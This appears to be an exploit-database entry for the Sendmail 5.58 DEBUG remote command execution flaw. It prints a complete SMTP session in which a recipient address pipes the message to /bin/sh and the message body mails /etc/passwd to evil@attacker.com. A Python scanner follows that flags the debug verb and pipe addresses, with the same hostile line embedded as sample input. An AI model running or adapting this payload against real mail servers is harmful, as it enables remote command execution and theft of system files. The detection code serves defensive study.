Berkeley Sendmail 5.58 - Debug
Author: anonymous
type: remote
platform: linux
date_added: 1988-08-01
date_updated: 2017-09-25
verified: 1
codes: OSVDB-195;CVE-1999-0095
raw file: 19028.txt

220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF>.<CRLF>
mail evil@attacker.com </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

The sed command in the recipient address strips all mail headers from the message before passing it on to the shell.
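
A detection-side illustration of the session above, added here and not part of the original entry: a small Python scanner that walks an SMTP transcript and flags the two markers this session shows, the debug verb and an envelope address that begins with a pipe. The function name, rule names, hostnames and both sample sessions are constructed for the example; it assumes client and server lines are interleaved in one transcript, as in the listing above.

```python
import re

REPLY = re.compile(r"^\d{3}[ -]")  # server replies start with a 3-digit code
ADDR = re.compile(r'^(?:mail\s+from|rcpt\s+to)\s*:\s*<?\s*"?\s*(.*)$', re.I)

def scan_session(lines):
    """Return (line_no, rule) findings for one SMTP session transcript."""
    findings, in_data = [], False
    for no, raw in enumerate(lines, 1):
        line = raw.strip()
        if in_data:
            # Message body: skip until the lone dot, so body text is never
            # mistaken for SMTP verbs.
            in_data = line != "."
            continue
        if REPLY.match(line):
            # 354 means DATA was accepted and the message body follows.
            in_data = line.startswith("354")
            continue
        if line.lower().split()[:1] == ["debug"]:
            findings.append((no, "debug-verb"))
            continue
        m = ADDR.match(line)
        if m and m.group(1).startswith("|"):
            # Envelope address that names a program instead of a mailbox.
            findings.append((no, "pipe-address"))
    return findings

# Constructed sample sessions (hostnames are placeholders, not from the page).
SUSPECT = [
    "220 mail.example.test SMTP", "helo client.example.test",
    "250 Hello client.example.test, pleased to meet you.",
    "debug", "200 OK",
    "mail from: </dev/null>", "250 OK",
    "rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0\">", "250 OK",
    "quit",
]
BENIGN = [
    "220 mail.example.test SMTP",
    "mail from:<alice@example.test>", "250 OK",
    "rcpt to:<bob@example.test>", "250 OK",
    "data", "354 Start mail input; end with <CRLF>.<CRLF>",
    "debug", "rcpt to:<|body text, not a command>", ".", "250 OK",
]

if __name__ == "__main__":
    print(scan_session(SUSPECT), scan_session(BENIGN))
```

The benign session carries the same strings inside a message body, which the scanner ignores because it tracks the DATA phase.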